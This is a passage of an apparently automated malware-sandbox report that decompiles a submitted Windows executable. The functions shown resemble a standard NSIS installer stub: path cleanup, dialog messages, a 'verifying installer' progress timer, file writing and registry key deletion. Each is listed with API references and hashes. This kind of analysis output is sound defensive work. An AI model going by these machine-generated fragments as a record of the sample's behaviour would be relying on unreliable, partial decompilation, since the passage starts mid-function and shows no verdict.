                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                          														 *(__ebp - 0x38) = __eax;
                          														if(__ax == __bx) {
                          															goto L34;
                          														} else {
                          															goto L26;
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          								goto L37;
                          								L26:
                          								__eax =  *(__ebp - 8);
                          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                          						}
                          						goto L34;
                          					}
                          				}
                          				L37:
                          				return 0;
                          			}








                          0x004026ec
                          0x004026ee
                          0x004026f1
                          0x004026f3
                          0x004026f6
                          0x004026fb
                          0x004026ff
                          0x00402702
                          0x00402705
                          0x00402c2a
                          0x00402c2d
                          0x0040270b
                          0x0040270b
                          0x00402712
                          0x00402714
                          0x00402714
                          0x0040271a
                          0x0040287e
                          0x0040287e
                          0x00402881
                          0x00402886
                          0x004015b6
                          0x0040292e
                          0x0040292e
                          0x00000000
                          0x00402720
                          0x00402721
                          0x0040272c
                          0x0040272f
                          0x0040273b
                          0x0040273f
                          0x004027d7
                          0x004027ef
                          0x004027ff
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402745
                          0x00402745
                          0x00402748
                          0x00402749
                          0x0040274c
                          0x00402751
                          0x00402758
                          0x00402760
                          0x00000000
                          0x00402766
                          0x00402766
                          0x0040276b
                          0x00000000
                          0x00402771
                          0x00402771
                          0x00402779
                          0x0040277c
                          0x0040277f
                          0x0040283a
                          0x00402841
                          0x00402785
                          0x0040278b
                          0x00402797
                          0x00402801
                          0x00402801
                          0x00402799
                          0x00402799
                          0x0040279c
                          0x0040279e
                          0x0040279e
                          0x0040279e
                          0x004027a1
                          0x004027a6
                          0x004027a9
                          0x00000000
                          0x00000000
                          0x004027ab
                          0x004027ae
                          0x004027bc
                          0x004027c2
                          0x004027d0
                          0x00000000
                          0x004027d2
                          0x00000000
                          0x004027d2
                          0x00000000
                          0x004027d0
                          0x0040279e
                          0x00402804
                          0x00402807
                          0x00000000
                          0x00402809
                          0x0040280e
                          0x0040284f
                          0x00402871
                          0x00402878
                          0x0040285d
                          0x0040285d
                          0x00402860
                          0x00402863
                          0x00402866
                          0x00402866
                          0x00000000
                          0x00402817
                          0x00402817
                          0x0040281a
                          0x0040281d
                          0x00402823
                          0x00402827
                          0x0040282a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040282a
                          0x0040280e
                          0x00402807
                          0x0040277f
                          0x0040276b
                          0x00402760
                          0x00000000
                          0x0040282c
                          0x0040282c
                          0x0040282f
                          0x00402838
                          0x00000000
                          0x0040272f
                          0x0040271a
                          0x00402c33
                          0x00402c39

                          APIs
                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                            • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: File$Pointer$ByteCharMultiWide$Read
                          • String ID: 9
                          • API String ID: 163830602-2366072709
                          • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                          • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                          • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                          • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0040678E(WCHAR* _a4) {
                          				short _t5;
                          				short _t7;
                          				WCHAR* _t19;
                          				WCHAR* _t20;
                          				WCHAR* _t21;
                          
                          				_t20 = _a4;
                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                          					_t20 =  &(_t20[4]);
                          				}
                          				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
                          					_t20 =  &(_t20[2]);
                          				}
                          				_t5 =  *_t20;
                          				_t21 = _t20;
                          				_t19 = _t20;
                          				if(_t5 != 0) {
                          					do {
                          						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
                          							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                          							_t19 = CharNextW(_t19);
                          						}
                          						_t20 = CharNextW(_t20);
                          						_t5 =  *_t20;
                          					} while (_t5 != 0);
                          				}
                          				 *_t19 =  *_t19 & 0x00000000;
                          				while(1) {
                          					_push(_t19);
                          					_push(_t21);
                          					_t19 = CharPrevW();
                          					_t7 =  *_t19;
                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                          						break;
                          					}
                          					 *_t19 =  *_t19 & 0x00000000;
                          					if(_t21 < _t19) {
                          						continue;
                          					}
                          					break;
                          				}
                          				return _t7;
                          			}








                          0x00406790
                          0x00406799
                          0x004067b0
                          0x004067b0
                          0x004067b7
                          0x004067c3
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067ce
                          0x004067d0
                          0x004067d9
                          0x004067dd
                          0x004067fa
                          0x00406802
                          0x00406802
                          0x00406807
                          0x00406809
                          0x0040680c
                          0x00406811
                          0x00406812
                          0x00406816
                          0x00406816
                          0x00406817
                          0x0040681e
                          0x00406820
                          0x00406827
                          0x00000000
                          0x00000000
                          0x0040682f
                          0x00406835
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406835
                          0x0040683a

                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                          • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                          • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                          • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-4010320282
                          • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                          • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                          • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                          • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
                          				long _v8;
                          				signed char _v12;
                          				unsigned int _v16;
                          				void* _v20;
                          				intOrPtr _v24;
                          				long _v56;
                          				void* _v60;
                          				long _t15;
                          				unsigned int _t19;
                          				signed int _t25;
                          				struct HWND__* _t28;
                          
                          				_t28 = _a4;
                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                          				if(_a8 == 0) {
                          					L4:
                          					_v56 = _t15;
                          					_v60 = 4;
                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                          					return _v24;
                          				}
                          				_t19 = GetMessagePos();
                          				_v16 = _t19 >> 0x10;
                          				_v20 = _t19;
                          				ScreenToClient(_t28,  &_v20);
                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                          				if((_v12 & 0x00000066) != 0) {
                          					_t15 = _v8;
                          					goto L4;
                          				}
                          				return _t25 | 0xffffffff;
                          			}














                          0x00404e2c
                          0x00404e39
                          0x00404e3f
                          0x00404e7d
                          0x00404e7d
                          0x00404e8c
                          0x00404e93
                          0x00000000
                          0x00404e95
                          0x00404e41
                          0x00404e50
                          0x00404e58
                          0x00404e5b
                          0x00404e6d
                          0x00404e73
                          0x00404e7a
                          0x00000000
                          0x00404e7a
                          0x00000000

                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                          • GetMessagePos.USER32 ref: 00404E41
                          • ScreenToClient.USER32 ref: 00404E5B
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                          • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                          				short _v132;
                          				int _t11;
                          				int _t20;
                          
                          				if(_a8 == 0x110) {
                          					SetTimer(_a4, 1, 0xfa, 0);
                          					_a8 = 0x113;
                          				}
                          				if(_a8 == 0x113) {
                          					_t20 =  *0x414eb8; // 0x9000
                          					_t11 =  *0x420ec4;
                          					if(_t20 >= _t11) {
                          						_t20 = _t11;
                          					}
                          					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                          					SetWindowTextW(_a4,  &_v132);
                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                          				}
                          				return 0;
                          			}






                          0x00402fa3
                          0x00402fb1
                          0x00402fb7
                          0x00402fb7
                          0x00402fc5
                          0x00402fc7
                          0x00402fcd
                          0x00402fd4
                          0x00402fd6
                          0x00402fd6
                          0x00402fec
                          0x00402ffc
                          0x0040300e
                          0x0040300e
                          0x00403016

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                          • MulDiv.KERNEL32(00009000,00000064,?), ref: 00402FDC
                          • wsprintfW.USER32 ref: 00402FEC
                          • SetWindowTextW.USER32(?,?), ref: 00402FFC
                          • SetDlgItemTextW.USER32 ref: 0040300E
                          Strings
                          • verifying installer: %d%%, xrefs: 00402FE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                          • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                          • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                          • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00402950(int __ebx) {
                          				WCHAR* _t26;
                          				void* _t29;
                          				long _t37;
                          				int _t49;
                          				void* _t52;
                          				void* _t54;
                          				void* _t56;
                          				void* _t59;
                          				void* _t60;
                          				void* _t61;
                          
                          				_t49 = __ebx;
                          				_t52 = 0xfffffd66;
                          				_t26 = E00402DA6(0xfffffff0);
                          				_t55 = _t26;
                          				 *(_t61 - 0x40) = _t26;
                          				if(E00405E4D(_t26) == 0) {
                          					E00402DA6(0xffffffed);
                          				}
                          				E00405FD2(_t55);
                          				_t29 = E00405FF7(_t55, 0x40000000, 2);
                          				 *(_t61 + 8) = _t29;
                          				if(_t29 != 0xffffffff) {
                          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                          					if( *(_t61 - 0x28) != _t49) {
                          						_t37 =  *0x42a234;
                          						 *(_t61 - 0x44) = _t37;
                          						_t54 = GlobalAlloc(0x40, _t37);
                          						if(_t54 != _t49) {
                          							E004034AF(_t49);
                          							E00403499(_t54,  *(_t61 - 0x44));
                          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                          							 *(_t61 - 0x10) = _t59;
                          							if(_t59 != _t49) {
                          								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                          								while( *_t59 != _t49) {
                          									_t60 = _t59 + 8;
                          									 *(_t61 - 0x3c) =  *_t59;
                          									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                          									_t59 = _t60 +  *(_t61 - 0x3c);
                          								}
                          								GlobalFree( *(_t61 - 0x10));
                          							}
                          							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                          							GlobalFree(_t54);
                          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                          						}
                          					}
                          					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                          					CloseHandle( *(_t61 + 8));
                          				}
                          				_t56 = 0xfffffff3;
                          				if(_t52 < _t49) {
                          					_t56 = 0xffffffef;
                          					DeleteFileW( *(_t61 - 0x40));
                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                          				}
                          				_push(_t56);
                          				E00401423();
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
                          				return 0;
                          			}













                          0x00402950
                          0x00402952
                          0x00402957
                          0x0040295c
                          0x0040295f
                          0x00402969
                          0x0040296d
                          0x0040296d
                          0x00402973
                          0x00402980
                          0x00402988
                          0x0040298b
                          0x00402997
                          0x0040299a
                          0x004029a0
                          0x004029ae
                          0x004029b3
                          0x004029b7
                          0x004029ba
                          0x004029c3
                          0x004029cf
                          0x004029d3
                          0x004029d6
                          0x004029e0
                          0x004029ff
                          0x004029ec
                          0x004029f4
                          0x004029f7
                          0x004029fc
                          0x004029fc
                          0x00402a06
                          0x00402a06
                          0x00402a13
                          0x00402a19
                          0x00402a1f
                          0x00402a1f
                          0x004029b7
                          0x00402a33
                          0x00402a35
                          0x00402a35
                          0x00402a3f
                          0x00402a40
                          0x00402a44
                          0x00402a48
                          0x00402a4e
                          0x00402a4e
                          0x00402a55
                          0x004022f1
                          0x00402c2d
                          0x00402c39

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                          • GlobalFree.KERNEL32 ref: 00402A06
                          • GlobalFree.KERNEL32 ref: 00402A19
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                          • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                          • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                          • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                          				void* _v8;
                          				int _v12;
                          				short _v536;
                          				void* _t27;
                          				signed int _t33;
                          				intOrPtr* _t35;
                          				signed int _t45;
                          				signed int _t46;
                          				signed int _t47;
                          
                          				_t46 = _a12;
                          				_t47 = _t46 & 0x00000300;
                          				_t45 = _t46 & 0x00000001;
                          				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                          				if(_t27 == 0) {
                          					if((_a12 & 0x00000002) == 0) {
                          						L3:
                          						_push(0x105);
                          						_push( &_v536);
                          						_push(0);
                          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                          							__eflags = _t45;
                          							if(__eflags != 0) {
                          								L10:
                          								RegCloseKey(_v8);
                          								return 0x3eb;
                          							}
                          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                          							__eflags = _t33;
                          							if(_t33 != 0) {
                          								break;
                          							}
                          							_push(0x105);
                          							_push( &_v536);
                          							_push(_t45);
                          						}
                          						RegCloseKey(_v8);
                          						_t35 = E004068D4(3);
                          						if(_t35 != 0) {
                          							return  *_t35(_a4, _a8, _t47, 0);
                          						}
                          						return RegDeleteKeyW(_a4, _a8);
                          					}
                          					_v12 = 0;
                          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                          						goto L10;
                          					}
                          					goto L3;
                          				}
                          				return _t27;
                          			}












                          0x00402eb4
                          0x00402ebd
                          0x00402ec6
                          0x00402ed2
                          0x00402edb
                          0x00402ee5
                          0x00402f0a
                          0x00402f10
                          0x00402f15
                          0x00402f16
                          0x00402f46
                          0x00402f1f
                          0x00402f21
                          0x00402f71
                          0x00402f74
                          0x00000000
                          0x00402f7a
                          0x00402f30
                          0x00402f35
                          0x00402f37
                          0x00000000
                          0x00000000
                          0x00402f3f
                          0x00402f44
                          0x00402f45
                          0x00402f45
                          0x00402f52
                          0x00402f5a
                          0x00402f61
                          0x00000000
                          0x00402f8a
                          0x00000000
                          0x00402f69
                          0x00402ef5
                          0x00402f08
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402f08
                          0x00402f90

                          APIs
                          • RegEnumValueW.ADVAPI32 ref: 00402EFD
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                          • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                          • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                          • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E00401D81(void* __ebx, void* __edx) {
                          				struct HWND__* _t30;
                          				WCHAR* _t38;
                          				void* _t48;
                          				void* _t53;
                          				signed int _t55;
                          				signed int _t60;
                          				long _t63;
                          				void* _t65;
                          
                          				_t53 = __ebx;
                          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                          				} else {
                          					E00402D84(2);
                          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                          				}
                          				_t55 =  *(_t65 - 0x24);
                          				 *(_t65 + 8) = _t30;
                          				_t60 = _t55 & 0x00000004;
                          				 *(_t65 - 0x38) = _t55 & 0x00000003;
                          				 *(_t65 - 0x18) = _t55 >> 0x1f;
                          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                          				if((_t55 & 0x00010000) == 0) {
                          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                          				} else {
                          					_t38 = E00402DA6(0x11);
                          				}
                          				 *(_t65 - 0x44) = _t38;
                          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                          				asm("sbb esi, esi");
                          				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                          					DeleteObject(_t48);
                          				}
                          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                          					_push(_t63);
                          					E0040644E();
                          				}
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
                          				return 0;
                          			}











                          0x00401d81
                          0x00401d85
                          0x00401d9a
                          0x00401d87
                          0x00401d89
                          0x00401d8f
                          0x00401d8f
                          0x00401da0
                          0x00401da3
                          0x00401dad
                          0x00401db0
                          0x00401db8
                          0x00401dc9
                          0x00401dcc
                          0x00401dd7
                          0x00401dce
                          0x00401dd0
                          0x00401dd0
                          0x00401ddb
                          0x00401de5
                          0x00401e0c
                          0x00401e1b
                          0x00401e29
                          0x00401e31
                          0x00401e39
                          0x00401e39
                          0x00401e42
                          0x00401e48
                          0x00402ba4
                          0x00402ba4
                          0x00402c2d
                          0x00402c39

                          APIs
                          • GetDlgItem.USER32 ref: 00401D9A
                          • GetClientRect.USER32(?,?), ref: 00401DE5
